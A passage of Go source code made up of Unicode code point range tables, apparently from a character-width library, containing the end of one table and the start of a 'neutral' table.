{0x1D1E9, 0x1D1FF}, {0x1D246, 0x1D2FF}, {0x1D357, 0x1D35F},
{0x1D372, 0x1D3FF}, {0x1D455, 0x1D455}, {0x1D49D, 0x1D49D},
{0x1D4A0, 0x1D4A1}, {0x1D4A3, 0x1D4A4}, {0x1D4A7, 0x1D4A8},
{0x1D4AD, 0x1D4AD}, {0x1D4BA, 0x1D4BA}, {0x1D4BC, 0x1D4BC},
{0x1D4C4, 0x1D4C4}, {0x1D506, 0x1D506}, {0x1D50B, 0x1D50C},
{0x1D515, 0x1D515}, {0x1D51D, 0x1D51D}, {0x1D53A, 0x1D53A},
{0x1D53F, 0x1D53F}, {0x1D545, 0x1D545}, {0x1D547, 0x1D549},
{0x1D551, 0x1D551}, {0x1D6A6, 0x1D6A7}, {0x1D7CC, 0x1D7CD},
{0x1DA8C, 0x1DA9A}, {0x1DAA0, 0x1DAA0}, {0x1DAB0, 0x1DFFF},
{0x1E007, 0x1E007}, {0x1E019, 0x1E01A}, {0x1E022, 0x1E022},
{0x1E025, 0x1E025}, {0x1E02B, 0x1E7FF}, {0x1E8C5, 0x1E8C6},
{0x1E8D7, 0x1E8FF}, {0x1E94B, 0x1E94F}, {0x1E95A, 0x1E95D},
{0x1E960, 0x1EDFF}, {0x1EE04, 0x1EE04}, {0x1EE20, 0x1EE20},
{0x1EE23, 0x1EE23}, {0x1EE25, 0x1EE26}, {0x1EE28, 0x1EE28},
{0x1EE33, 0x1EE33}, {0x1EE38, 0x1EE38}, {0x1EE3A, 0x1EE3A},
{0x1EE3C, 0x1EE41}, {0x1EE43, 0x1EE46}, {0x1EE48, 0x1EE48},
{0x1EE4A, 0x1EE4A}, {0x1EE4C, 0x1EE4C}, {0x1EE50, 0x1EE50},
{0x1EE53, 0x1EE53}, {0x1EE55, 0x1EE56}, {0x1EE58, 0x1EE58},
{0x1EE5A, 0x1EE5A}, {0x1EE5C, 0x1EE5C}, {0x1EE5E, 0x1EE5E},
{0x1EE60, 0x1EE60}, {0x1EE63, 0x1EE63}, {0x1EE65, 0x1EE66},
{0x1EE6B, 0x1EE6B}, {0x1EE73, 0x1EE73}, {0x1EE78, 0x1EE78},
{0x1EE7D, 0x1EE7D}, {0x1EE7F, 0x1EE7F}, {0x1EE8A, 0x1EE8A},
{0x1EE9C, 0x1EEA0}, {0x1EEA4, 0x1EEA4}, {0x1EEAA, 0x1EEAA},
{0x1EEBC, 0x1EEEF}, {0x1EEF2, 0x1EFFF}, {0x1F02C, 0x1F02F},
{0x1F094, 0x1F09F}, {0x1F0AF, 0x1F0B0}, {0x1F0C0, 0x1F0C0},
{0x1F0D0, 0x1F0D0}, {0x1F0F6, 0x1F0FF}, {0x1F10D, 0x1F10F},
{0x1F12F, 0x1F12F}, {0x1F16C, 0x1F16F}, {0x1F1AD, 0x1F1E5},
{0x1F203, 0x1F20F}, {0x1F23C, 0x1F23F}, {0x1F249, 0x1F24F},
{0x1F252, 0x1F2FF}, {0x1F6D3, 0x1F6DF}, {0x1F6ED, 0x1F6EF},
{0x1F6F7, 0x1F6FF}, {0x1F774, 0x1F77F}, {0x1F7D5, 0x1F7FF},
{0x1F80C, 0x1F80F}, {0x1F848, 0x1F84F}, {0x1F85A, 0x1F85F},
{0x1F888, 0x1F88F}, {0x1F8AE, 0x1F90F}, {0x1F91F, 0x1F91F},
{0x1F928, 0x1F92F}, {0x1F931, 0x1F932}, {0x1F93F, 0x1F93F},
{0x1F94C, 0x1F94F}, {0x1F95F, 0x1F97F}, {0x1F992, 0x1F9BF},
{0x1F9C1, 0x1FFFF}, {0x2A6D7, 0x2A6FF}, {0x2B735, 0x2B73F},
{0x2B81E, 0x2B81F}, {0x2CEA2, 0x2F7FF}, {0x2FA1E, 0xE0000},
{0xE0002, 0xE001F}, {0xE0080, 0xE00FF}, {0xE01F0, 0xEFFFF},
{0xFFFFE, 0xFFFFF},
}
var neutral = table{
{0x0000, 0x001F}, {0x007F, 0x007F}, {0x0080, 0x009F},
{0x00A0, 0x00A0}, {0x00A9, 0x00A9}, {0x00AB, 0x00AB},
{0x00B5, 0x00B5}, {0x00BB, 0x00BB}, {0x00C0, 0x00C5},
{0x00C7, 0x00CF}, {0x00D1, 0x00D6}, {0x00D9, 0x00DD},
{0x00E2, 0x00E5}, {0x00E7, 0x00E7}, {0x00EB, 0x00EB},
{0x00EE, 0x00EF}, {0x00F1, 0x00F1}, {0x00F4, 0x00F6},
{0x00FB, 0x00FB}, {0x00FD, 0x00FD}, {0x00FF, 0x00FF},
{0x0100, 0x0100}, {0x0102, 0x0110}, {0x0112, 0x0112},
{0x0114, 0x011A}, {0x011C, 0x0125}, {0x0128, 0x012A},
{0x012C, 0x0130}, {0x0134, 0x0137}, {0x0139, 0x013E},
{0x0143, 0x0143}, {0x0145, 0x0147}, {0x014C, 0x014C},
{0x014E, 0x0151}, {0x0154, 0x0165}, {0x0168, 0x016A},
{0x016C, 0x017F}, {0x0180, 0x01BA}, {0x01BB, 0x01BB},
{0x01BC, 0x01BF}, {0x01C0, 0x01C3}, {0x01C4, 0x01CD},
{0x01CF, 0x01CF}, {0x01D1, 0x01D1}, {0x01D3, 0x01D3},
{0x01D5, 0x01D5}, {0x01D7, 0x01D7}, {0x01D9, 0x01D9},
{0x01DB, 0x01DB}, {0x01DD, 0x024F}, {0x0250, 0x0250},
{0x0252, 0x0260}, {0x0262, 0x0293}, {0x0294, 0x0294},
{0x0295, 0x02AF}, {0x02B0, 0x02C1}, {0x02C2, 0x02C3},
{0x02C5, 0x02C5}, {0x02C6, 0x02C6}, {0x02C8, 0x02C8},
{0x02CC, 0x02CC}, {0x02CE, 0x02CF}, {0x02D1, 0x02D1},
{0x02D2, 0x02D7}, {0x02DC, 0x02DC}, {0x02DE, 0x02DE},
{0x02E0, 0x02E4}, {0x02E5, 0x02EB}, {0x02EC, 0x02EC},
{0x02ED, 0x02ED}, {0x02EE, 0x02EE}, {0x02EF, 0x02FF},
{0x0370, 0x0373}, {0x0374, 0x0374}, {0x0375, 0x0375},
{0x0376, 0x0377}, {0x037A, 0x037A}, {0x037B, 0x037D},
{0x037E, 0x037E}, {0x037F, 0x037F}, {0x0384, 0x0385},
{0x0386, 0x0386}, {0x0387, 0x0387}, {0x0388, 0x038A},
{0x038C, 0x038C}, {0x038E, 0x0390}, {0x03AA, 0x03B0},
{0x03C2, 0x03C2}, {0x03CA, 0x03F5}, {0x03F6, 0x03F6},
{0x03F7, 0x03FF}, {0x0400, 0x0400}, {0x0402, 0x040F},
{0x0450, 0x0450}, {0x0452, 0x0481}, {0x0482, 0x0482},
{0x0483, 0x0487}, {0x0488, 0x0489}, {0x048A, 0x04FF},
{0x0500, 0x052F}, {0x0531, 0x0556}, {0x0559, 0x0559},
{0x055A, 0x055F}, {0x0561, 0x0587}, {0x0589, 0x0589},
{0x058A, 0x058A}, {0x058D, 0x058E}, {0x058F, 0x058F},
{0x0591, 0x05BD}, {0x05BE, 0x05BE}, {0x05BF, 0x05BF},
{0x05C0, 0x05C0}, {0x05C1, 0x05C2}, {0x05C3, 0x05C3},
{0x05C4, 0x05C5}, {0x05C6, 0x05C6}, {0x05C7, 0x05C7},
{0x05D0, 0x05EA}, {0x05F0, 0x05F2}, {0x05F3, 0x05F4},
{0x0600, 0x0605}, {0x0606, 0x0608}, {0x0609, 0x060A},
{0x060B, 0x060B}, {0x060C, 0x060D}, {0x060E, 0x060F},
{0x0610, 0x061A}, {0x061B, 0x061B}, {0x061C, 0x061C},
{0x061E, 0x061F}, {0x0620, 0x063F}, {0x0640, 0x0640},
{0x0641, 0x064A}, {0x064B, 0x065F}, {0x0660, 0x0669},
{0x066A, 0x066D}, {0x066E, 0x066F}, {0x0670, 0x0670},
{0x0671, 0x06D3}, {0x06D4, 0x06D4}, {0x06D5, 0x06D5},
{0x06D6, 0x06DC}, {0x06DD, 0x06DD}, {0x06DE, 0x06DE},
{0x06DF, 0x06E4}, {0x06E5, 0x06E6}, {0x06E7, 0x06E8},
{0x06E9, 0x06E9}, {0x06EA, 0x06ED}, {0x06EE, 0x06EF},
{0x06F0, 0x06F9}, {0x06FA, 0x06FC}, {0x06FD, 0x06FE},
{0x06FF, 0x06FF}, {0x0700, 0x070D}, {0x070F, 0x070F},
{0x0710, 0x0710}, {0x0711, 0x0711}, {0x0712, 0x072F},
{0x0730, 0x074A}, {0x074D, 0x074F}, {0x0750, 0x077F},
{0x0780, 0x07A5}, {0x07A6, 0x07B0}, {0x07B1, 0x07B1},
{0x07C0, 0x07C9}, {0x07CA, 0x07EA}, {0x07EB, 0x07F3},
{0x07F4, 0x07F5}, {0x07F6, 0x07F6}, {0x07F7, 0x07F9},
{0x07FA, 0x07FA}, {0x0800, 0x0815}, {0x0816, 0x0819},
{0x081A, 0x081A}, {0x081B, 0x0823}, {0x0824, 0x0824},
{0x0825, 0x0827}, {0x0828, 0x0828}, {0x0829, 0x082D},
{0x0830, 0x083E}, {0x0840, 0x0858}, {0x0859, 0x085B},
{0x085E, 0x085E}, {0x08A0, 0x08B4}, {0x08B6, 0x08BD},
{0x08D4, 0x08E1}, {0x08E2, 0x08E2}, {0x08E3, 0x08FF},
{0x0900, 0x0902}, {0x0903, 0x0903}, {0x0904, 0x0939},
{0x093A, 0x093A}, {0x093B, 0x093B}, {0x093C, 0x093C},
{0x093D, 0x093D}, {0x093E, 0x0940}, {0x0941, 0x0948},
{0x0949, 0x094C}, {0x094D, 0x094D}, {0x094E, 0x094F},
{0x0950, 0x0950}, {0x0951, 0x0957}, {0x0958, 0x0961},
{0x0962, 0x0963}, {0x0964, 0x0965}, {0x0966, 0x096F},
{0x0970, 0x0970}, {0x0971, 0x0971}, {0x0972, 0x097F},
{0x0980, 0x0980}, {0x0981, 0x0981}, {0x0982, 0x0983},
{0x0985, 0x098C}, {0x098F, 0x0990}, {0x0993, 0x09A8},
{0x09AA, 0x09B0}, {0x09B2, 0x09B2}, {0x09B6, 0x09B9},
{0x09BC, 0x09BC}, {0x09BD, 0x09BD}, {0x09BE, 0x09C0},
{0x09C1, 0x09C4}, {0x09C7, 0x09C8}, {0x09CB, 0x09CC},
{0x09CD, 0x09CD}, {0x09CE, 0x09CE}, {0x09D7, 0x09D7},
{0x09DC, 0x09DD}, {0x09DF, 0x09E1}, {0x09E2, 0x09E3},
{0x09E6, 0x09EF}, {0x09F0, 0x09F1}, {0x09F2, 0x09F3},
{0x09F4, 0x09F9}, {0x09FA, 0x09FA}, {0x09FB, 0x09FB},
{0x0A01, 0x0A02}, {0x0A03, 0x0A03}, {0x0A05, 0x0A0A},
{0x0A0F, 0x0A10}, {0x0A13, 0x0A28}, {0x0A2A, 0x0A30},
{0x0A32, 0x0A33}, {0x0A35, 0x0A36}, {0x0A38, 0x0A39},
{0x0A3C, 0x0A3C}, {0x0A3E, 0x0A40}, {0x0A41, 0x0A42},
{0x0A47, 0x0A48}, {0x0A4B, 0x0A4D}, {0x0A51, 0x0A51},
{0x0A59, 0x0A5C}, {0x0A5E, 0x0A5E}, {0x0A66, 0x0A6F},
{0x0A70, 0x0A71}, {0x0A72, 0x0A74}, {0x0A75, 0x0A75},
{0x0A81, 0x0A82}, {0x0A83, 0x0A83}, {0x0A85, 0x0A8D},
{0x0A8F, 0x0A91}, {0x0A93, 0x0AA8}, {0x0AAA, 0x0AB0},
{0x0AB2, 0x0AB3}, {0x0AB5, 0x0AB9}, {0x0ABC, 0x0ABC},
{0x0ABD, 0x0ABD}, {0x0ABE, 0x0AC0}, {0x0AC1, 0x0AC5},
{0x0AC7, 0x0AC8}, {0x0AC9, 0x0AC9}, {0x0ACB, 0x0ACC},
{0x0ACD, 0x0ACD}, {0x0AD0, 0x0AD0}, {0x0AE0, 0x0AE1},
{0x0AE2, 0x0AE3}, {0x0AE6, 0x0AEF}, {0x0AF0, 0x0AF0},
{0x0AF1, 0x0AF1}, {0x0AF9, 0x0AF9}, {0x0B01, 0x0B01},
{0x0B02, 0x0B03}, {0x0B05, 0x0B0C}, {0x0B0F, 0x0B10},
{0x0B13, 0x0B28}, {0x0B2A, 0x0B30}, {0x0B32, 0x0B33},
{0x0B35, 0x0B39}, {0x0B3C, 0x0B3C}, {0x0B3D, 0x0B3D},
{0x0B3E, 0x0B3E}, {0x0B3F, 0x0B3F}, {0x0B40, 0x0B40},
{0x0B41, 0x0B44}, {0x0B47, 0x0B48}, {0x0B4B, 0x0B4C},
{0x0B4D, 0x0B4D}, {0x0B56, 0x0B56}, {0x0B57, 0x0B57},
{0x0B5C, 0x0B5D}, {0x0B5F, 0x0B61}, {0x0B62, 0x0B63},
{0x0B66, 0x0B6F}, {0x0B70, 0x0B70}, {0x0B71, 0x0B71},
{0x0B72, 0x0B77}, {0x0B82, 0x0B82}, {0x0B83, 0x0B83},
{0x0B85, 0x0B8A}, {0x0B8E, 0x0B90}, {0x0B92, 0x0B95},
{0x0B99, 0x0B9A}, {0x0B9C, 0x0B9C}, {0x0B9E, 0x0B9F},
{0x0BA3, 0x0BA4}, {0x0BA8, 0x0BAA}, {0x0BAE, 0x0BB9},
{0x0BBE, 0x0BBF}, {0x0BC0, 0x0BC0}, {0x0BC1, 0x0BC2},
{0x0BC6, 0x0BC8}, {0x0BCA, 0x0BCC}, {0x0BCD, 0x0BCD},
{0x0BD0, 0x0BD0}, {0x0BD7, 0x0BD7}, {0x0BE6, 0x0BEF},
{0x0BF0, 0x0BF2}, {0x0BF3, 0x0BF8}, {0x0BF9, 0x0BF9},
{0x0BFA, 0x0BFA}, {0x0C00, 0x0C00}, {0x0C01, 0x0C03},
{0x0C05, 0x0C0C}, {0x0C0E, 0x0C10}, {0x0C12, 0x0C28},
{0x0C2A, 0x0C39}, {0x0C3D, 0x0C3D}, {0x0C3E, 0x0C40},
{0x0C41, 0x0C44}, {0x0C46, 0x0C48}, {0x0C4A, 0x0C4D},
{0x0C55, 0x0C56}, {0x0C58, 0x0C5A}, {0x0C60, 0x0C61},
{0x0C62, 0x0C63}, {0x0C66, 0x0C6F}, {0x0C78, 0x0C7E},
{0x0C7F, 0x0C7F}, {0x0C80, 0x0C80}, {0x0C81, 0x0C81},
{0x0C82, 0x0C83}, {0x0C85, 0x0C8C}, {0x0C8E, 0x0C90},
{0x0C92, 0x0CA8}, {0x0CAA, 0x0CB3}, {0x0CB5, 0x0CB9},
{0x0CBC, 0x0CBC}, {0x0CBD, 0x0CBD}, {0x0CBE, 0x0CBE},
{0x0CBF, 0x0CBF}, {0x0CC0, 0x0CC4}, {0x0CC6, 0x0CC6},
{0x0CC7, 0x0CC8}, {0x0CCA, 0x0CCB}, {0x0CCC, 0x0CCD},
{0x0CD5, 0x0CD6}, {0x0CDE, 0x0CDE}, {0x0CE0, 0x0CE1},
{0x0CE2, 0x0CE3}, {0x0CE6, 0x0CEF}, {0x0CF1, 0x0CF2},
{0x0D01, 0x0D01}, {0x0D02, 0x0D03}, {0x0D05, 0x0D0C},
{0x0D0E, 0x0D10}, {0x0D12, 0x0D3A}, {0x0D3D, 0x0D3D},
{0x0D3E, 0x0D40}, {0x0D41, 0x0D44}, {0x0D46, 0x0D48},
{0x0D4A, 0x0D4C}, {0x0D4D, 0x0D4D}, {0x0D4E, 0x0D4E},
{0x0D4F, 0x0D4F}, {0x0D54, 0x0D56}, {0x0D57, 0x0D57},
{0x0D58, 0x0D5E}, {0x0D5F, 0x0D61}, {0x0D62, 0x0D63},
{0x0D66, 0x0D6F}, {0x0D70, 0x0D78}, {0x0D79, 0x0D79},
{0x0D7A, 0x0D7F}, {0x0D82, 0x0D83}, {0x0D85, 0x0D96},
{0x0D9A, 0x0DB1}, {0x0DB3, 0x0DBB}, {0x0DBD, 0x0DBD},
{0x0DC0, 0x0DC6}, {0x0DCA, 0x0DCA}, {0x0DCF, 0x0DD1},
{0x0DD2, 0x0DD4}, {0x0DD6, 0x0DD6}, {0x0DD8, 0x0DDF},
{0x0DE6, 0x0DEF}, {0x0DF2, 0x0DF3}, {0x0DF4, 0x0DF4},
{0x0E01, 0x0E30}, {0x0E31, 0x0E31}, {0x0E32, 0x0E33},
{0x0E34, 0x0E3A}, {0x0E3F, 0x0E3F}, {0x0E40, 0x0E45},
{0x0E46, 0x0E46}, {0x0E47, 0x0E4E}, {0x0E4F, 0x0E4F},
{0x0E50, 0x0E59}, {0x0E5A, 0x0E5B}, {0x0E81, 0x0E82},
{0x0E84, 0x0E84}, {0x0E87, 0x0E88}, {0x0E8A, 0x0E8A},
{0x0E8D, 0x0E8D}, {0x0E94, 0x0E97}, {0x0E99, 0x0E9F},
{0x0EA1, 0x0EA3}, {0x0EA5, 0x0EA5}, {0x0EA7, 0x0EA7},
{0x0EAA, 0x0EAB}, {0x0EAD, 0x0EB0}, {0x0EB1, 0x0EB1},
{0x0EB2, 0x0EB3}, {0x0EB4, 0x0EB9}, {0x0EBB, 0x0EBC},
{0x0EBD, 0x0EBD}, {0x0EC0, 0x0EC4}, {0x0EC6, 0x0EC6},
{0x0EC8, 0x0ECD}, {0x0ED0, 0x0ED9}, {0x0EDC, 0x0EDF},
{0x0F00, 0x0F00}, {0x0F01, 0x0F03}, {0x0F04, 0x0F12},
{0x0F13, 0x0F13}, {0x0F14, 0x0F14}, {0x0F15, 0x0F17},
{0x0F18, 0x0F19}, {0x0F1A, 0x0F1F}, {0x0F20, 0x0F29},
{0x0F2A, 0x0F33}, {0x0F34, 0x0F34}, {0x0F35, 0x0F35},
{0x0F36, 0x0F36}, {0x0F37, 0x0F37}, {0x0F38, 0x0F38},
{0x0F39, 0x0F39}, {0x0F3A, 0x0F3A}, {0x0F3B, 0x0F3B},
{0x0F3C, 0x0F3C}, {0x0F3D, 0x0F3D}, {0x0F3E, 0x0F3F},
{0x0F40, 0x0F47}, {0x0F49, 0x0F6C}, {0x0F71, 0x0F7E},
{0x0F7F, 0x0F7F}, {0x0F80, 0x0F84}, {0x0F85, 0x0F85},
{0x0F86, 0x0F87}, {0x0F88, 0x0F8C}, {0x0F8D, 0x0F97},
{0x0F99, 0x0FBC}, {0x0FBE, 0x0FC5}, {0x0FC6, 0x0FC6},
{0x0FC7, 0x0FCC}, {0x0FCE, 0x0FCF}, {0x0FD0, 0x0FD4},
{0x0FD5, 0x0FD8}, {0x0FD9, 0x0FDA}, {0x1000, 0x102A},
{0x102B, 0x102C}, {0x102D, 0x1030}, {0x1031, 0x1031},
{0x1032, 0x1037}, {0x1038, 0x1038}, {0x1039, 0x103A},
{0x103B, 0x103C}, {0x103D, 0x103E}, {0x103F, 0x103F},
{0x1040, 0x1049}, {0x104A, 0x104F}, {0x1050, 0x1055},
{0x1056, 0x1057}, {0x1058, 0x1059}, {0x105A, 0x105D},
{0x105E, 0x1060}, {0x1061, 0x1061}, {0x1062, 0x1064},
{0x1065, 0x1066}, {0x1067, 0x106D}, {0x106E, 0x1070},
{0x1071, 0x1074}, {0x1075, 0x1081}, {0x1082, 0x1082},
{0x1083, 0x1084}, {0x1085, 0x1086}, {0x1087, 0x108C},
{0x108D, 0x108D}, {0x108E, 0x108E}, {0x108F, 0x108F},
{0x1090, 0x1099}, {0x109A, 0x109C}, {0x109D, 0x109D},
{0x109E, 0x109F}, {0x10A0, 0x10C5}, {0x10C7, 0x10C7},
{0x10CD, 0x10CD}, {0x10D0, 0x10FA}, {0x10FB, 0x10FB},
{0x10FC, 0x10FC}, {0x10FD, 0x10FF}, {0x1160, 0x11FF},
{0x1200, 0x1248}, {0x124A, 0x124D}, {0x1250, 0x1256},
{0x1258, 0x1258}, {0x125A, 0x125D}, {0x1260, 0x1288},
{0x128A, 0x128D}, {0x1290, 0x12B0}, {0x12B2, 0x12B5},
{0x12B8, 0x12BE}, {0x12C0, 0x12C0}, {0x12C2, 0x12C5},
{0x12C8, 0x12D6}, {0x12D8, 0x1310}, {0x1312, 0x1315},
{0x1318, 0x135A}, {0x135D, 0x135F}, {0x1360, 0x1368},
{0x1369, 0x137C}, {0x1380, 0x138F}, {0x1390, 0x1399},
{0x13A0, 0x13F5}, {0x13F8, 0x13FD}, {0x1400, 0x1400},
{0x1401, 0x166C}, {0x166D, 0x166E}, {0x166F, 0x167F},
{0x1680, 0x1680}, {0x1681, 0x169A}, {0x169B, 0x169B},
{0x169C, 0x169C}, {0x16A0, 0x16EA}, {0x16EB, 0x16ED},
{0x16EE, 0x16F0}, {0x16F1, 0x16F8}, {0x1700, 0x170C},
{0x170E, 0x1711}, {0x1712, 0x1714}, {0x1720, 0x1731},
{0x1732, 0x1734}, {0x1735, 0x1736}, {0x1740, 0x1751},
{0x1752, 0x1753}, {0x1760, 0x176C}, {0x176E, 0x1770},
{0x1772, 0x1773}, {0x1780, 0x17B3}, {0x17B4, 0x17B5},
{0x17B6, 0x17B6}, {0x17B7, 0x17BD}, {0x17BE, 0x17C5},
{0x17C6, 0x17C6}, {0x17C7, 0x17C8}, {0x17C9, 0x17D3},
{0x17D4, 0x17D6}, {0x17D7, 0x17D7}, {0x17D8, 0x17DA},
{0x17DB, 0x17DB}, {0x17DC, 0x17DC}, {0x17DD, 0x17DD},
{0x17E0, 0x17E9}, {0x17F0, 0x17F9}, {0x1800, 0x1805},
{0x1806, 0x1806}, {0x1807, 0x180A}, {0x180B, 0x180D},
{0x180E, 0x180E}, {0x1810, 0x1819}, {0x1820, 0x1842},
{0x1843, 0x1843}, {0x1844, 0x1877}, {0x1880, 0x1884},
{0x1885, 0x1886}, {0x1887, 0x18A8}, {0x18A9, 0x18A9},
{0x18AA, 0x18AA}, {0x18B0, 0x18F5}, {0x1900, 0x191E},
{0x1920, 0x1922}, {0x1923, 0x1926}, {0x1927, 0x1928},
{0x1929, 0x192B}, {0x1930, 0x1931}, {0x1932, 0x1932},
{0x1933, 0x1938}, {0x1939, 0x193B}, {0x1940, 0x1940},
{0x1944, 0x1945}, {0x1946, 0x194F}, {0x1950, 0x196D},
{0x1970, 0x1974}, {0x1980, 0x19AB}, {0x19B0, 0x19C9},
{0x19D0, 0x19D9}, {0x19DA, 0x19DA}, {0x19DE, 0x19DF},
{0x19E0, 0x19FF}, {0x1A00, 0x1A16}, {0x1A17, 0x1A18},
{0x1A19, 0x1A1A}, {0x1A1B, 0x1A1B}, {0x1A1E, 0x1A1F},
{0x1A20, 0x1A54}, {0x1A55, 0x1A55}, {0x1A56, 0x1A56},
{0x1A57, 0x1A57}, {0x1A58, 0x1A5E}, {0x1A60, 0x1A60},
{0x1A61, 0x1A61}, {0x1A62, 0x1A62}, {0x1A63, 0x1A64},
{0x1A65, 0x1A6C}, {0x1A6D, 0x1A72}, {0x1A73, 0x1A7C},
{0x1A7F, 0x1A7F}, {0x1A80, 0x1A89}, {0x1A90, 0x1A99},
{0x1AA0, 0x1AA6}, {0x1AA7, 0x1AA7}, {0x1AA8, 0x1AAD},
{0x1AB0, 0x1ABD}, {0x1ABE, 0x1ABE}, {0x1B00, 0x1B03},
{0x1B04, 0x1B04}, {0x1B05, 0x1B33}, {0x1B34, 0x1B34},
{0x1B35, 0x1B35}, {0x1B36, 0x1B3A}, {0x1B3B, 0x1B3B},
{0x1B3C, 0x1B3C}, {0x1B3D, 0x1B41}, {0x1B42, 0x1B42},
{0x1B43, 0x1B44}, {0x1B45, 0x1B4B}, {0x1B50, 0x1B59},
{0x1B5A, 0x1B60}, {0x1B61, 0x1B6A}, {0x1B6B, 0x1B73},
{0x1B74, 0x1B7C}, {0x1B80, 0x1B81}, {0x1B82, 0x1B82},
{0x1B83, 0x1BA0}, {0x1BA1, 0x1BA1}, {0x1BA2, 0x1BA5},
{0x1BA6, 0x1BA7}, {0x1BA8, 0x1BA9}, {0x1BAA, 0x1BAA},
{0x1BAB, 0x1BAD}, {0x1BAE, 0x1BAF}, {0x1BB0, 0x1BB9},
{0x1BBA, 0x1BBF}, {0x1BC0, 0x1BE5}, {0x1BE6, 0x1BE6},
{0x1BE7, 0x1BE7}, {0x1BE8, 0x1BE9}, {0x1BEA, 0x1BEC},
{0x1BED, 0x1BED}, {0x1BEE, 0x1BEE}, {0x1BEF, 0x1BF1},
{0x1BF2, 0x1BF3}, {0x1BFC, 0x1BFF}, {0x1C00, 0x1C23},
{0x1C24, 0x1C2B}, {0x1C2C, 0x1C33}, {0x1C34, 0x1C35},
{0x1C36, 0x1C37}, {0x1C3B, 0x1C3F}, {0x1C40, 0x1C49},
{0x1C4D, 0x1C4F}, {0x1C50, 0x1C59}, {0x1C5A, 0x1C77},
{0x1C78, 0x1C7D}, {0x1C7E, 0x1C7F}, {0x1C80, 0x1C88},
{0x1CC0, 0x1CC7}, {0x1CD0, 0x1CD2}, {0x1CD3, 0x1CD3},
{0x1CD4, 0x1CE0}, {0x1CE1, 0x1CE1}, {0x1CE2, 0x1CE8},
{0x1CE9, 0x1CEC}, {0x1CED, 0x1CED}, {0x1CEE, 0x1CF1},
{0x1CF2, 0x1CF3}, {0x1CF4, 0x1CF4}, {0x1CF5, 0x1CF6},
{0x1CF8, 0x1CF9}, {0x1D00, 0x1D2B}, {0x1D2C, 0x1D6A},
{0x1D6B, 0x1D77}, {0x1D78, 0x1D78}, {0x1D79, 0x1D7F},
{0x1D80, 0x1D9A}, {0x1D9B, 0x1DBF}, {0x1DC0, 0x1DF5},
{0x1DFB, 0x1DFF}, {0x1E00, 0x1EFF}, {0x1F00, 0x1F15},
{0x1F18, 0x1F1D}, {0x1F20, 0x1F45}, {0x1F48, 0x1F4D},
{0x1F50, 0x1F57}, {0x1F59, 0x1F59}, {0x1F5B, 0x1F5B},
{0x1F5D, 0x1F5D}, {0x1F5F, 0x1F7D}, {0x1F80, 0x1FB4},
{0x1FB6, 0x1FBC}, {0x1FBD, 0x1FBD}, {0x1FBE, 0x1FBE},
{0x1FBF, 0x1FC1}, {0x1FC2, 0x1FC4}, {0x1FC6, 0x1FCC},
{0x1FCD, 0x1FCF}, {0x1FD0, 0x1FD3}, {0x1FD6, 0x1FDB},
{0x1FDD, 0x1FDF}, {0x1FE0, 0x1FEC}, {0x1FED, 0x1FEF},
{0x1FF2, 0x1FF4}, {0x1FF6, 0x1FFC}, {0x1FFD, 0x1FFE},
{0x2000, 0x200A}, {0x200B, 0x200F}, {0x2011, 0x2012},
{0x2017, 0x2017}, {0x201A, 0x201A}, {0x201B, 0x201B},
{0x201E, 0x201E}, {0x201F, 0x201F}, {0x2023, 0x2023},
{0x2028, 0x2028}, {0x2029, 0x2029}, {0x202A, 0x202E},
{0x202F, 0x202F}, {0x2031, 0x2031}, {0x2034, 0x2034},
{0x2036, 0x2038}, {0x2039, 0x2039}, {0x203A, 0x203A},
{0x203C, 0x203D}, {0x203F, 0x2040}, {0x2041, 0x2043},
{0x2044, 0x2044}, {0x2045, 0x2045}, {0x2046, 0x2046},
{0x2047, 0x2051}, {0x2052, 0x2052}, {0x2053, 0x2053},
{0x2054, 0x2054}, {0x2055, 0x205E}, {0x205F, 0x205F},
{0x2060, 0x2064}, {0x2066, 0x206F}, {0x2070, 0x2070},
{0x2071, 0x2071}, {0x2075, 0x2079}, {0x207A, 0x207C},
{0x207D, 0x207D}, {0x207E, 0x207E}, {0x2080, 0x2080},
{0x2085, 0x2089}, {0x208A, 0x208C}, {0x208D, 0x208D},
{0x208E, 0x208E}, {0x2090, 0x209C}, {0x20A0, 0x20A8},
{0x20AA, 0x20AB}, {0x20AD, 0x20BE}, {0x20D0, 0x20DC},
{0x20DD, 0x20E0}, {0x20E1, 0x20E1}, {0x20E2, 0x20E4},
{0x20E5, 0x20F0}, {0x2100, 0x2101}, {0x2102, 0x2102},
{0x2104, 0x2104}, {0x2106, 0x2106}, {0x2107, 0x2107},
{0x2108, 0x2108}, {0x210A, 0x2112}, {0x2114, 0x2114},
{0x2115, 0x2115}, {0x2117, 0x2117}, {0x2118, 0x2118},
{0x2119, 0x211D}, {0x211E, 0x2120}, {0x2123, 0x2123},
{0x2124, 0x2124}, {0x2125, 0x2125}, {0x2127, 0x2127},
{0x2128, 0x2128}, {0x2129, 0x2129}, {0x212A, 0x212A},
{0x212C, 0x212D}, {0x212E, 0x212E}, {0x212F, 0x2134},
{0x2135, 0x2138}, {0x2139, 0x2139}, {0x213A, 0x213B},
{0x213C, 0x213F}, {0x2140, 0x2144}, {0x2145, 0x2149},
{0x214A, 0x214A}, {0x214B, 0x214B}, {0x214C, 0x214D},
{0x214E, 0x214E}, {0x214F, 0x214F}, {0x2150, 0x2152},
{0x2155, 0x215A}, {0x215F, 0x215F}, {0x216C, 0x216F},
{0x217A, 0x2182}, {0x2183, 0x2184}, {0x2185, 0x2188},
{0x218A, 0x218B}, {0x219A, 0x219B}, {0x219C, 0x219F},
{0x21A0, 0x21A0}, {0x21A1, 0x21A2}, {0x21A3, 0x21A3},
{0x21A4, 0x21A5}, {0x21A6, 0x21A6}, {0x21A7, 0x21AD},
{0x21AE, 0x21AE}, {0x21AF, 0x21B7}, {0x21BA, 0x21CD},
{0x21CE, 0x21CF}, {0x21D0, 0x21D1}, {0x21D3, 0x21D3},
{0x21D5, 0x21E6}, {0x21E8, 0x21F3}, {0x21F4, 0x21FF},
{0x2201, 0x2201}, {0x2204, 0x2206}, {0x2209, 0x220A},
{0x220C, 0x220E}, {0x2210, 0x2210}, {0x2212, 0x2214},
{0x2216, 0x2219}, {0x221B, 0x221C}, {0x2221, 0x2222},
{0x2224, 0x2224}, {0x2226, 0x2226}, {0x222D, 0x222D},
{0x222F, 0x2233}, {0x2238, 0x223B}, {0x223E, 0x2247},
{0x2249, 0x224B}, {0x224D, 0x2251}, {0x2253, 0x225F},
{0x2262, 0x2263}, {0x2268, 0x2269}, {0x226C, 0x226D},
{0x2270, 0x2281}, {0x2284, 0x2285}, {0x2288, 0x2294},
{0x2296, 0x2298}, {0x229A, 0x22A4}, {0x22A6, 0x22BE},
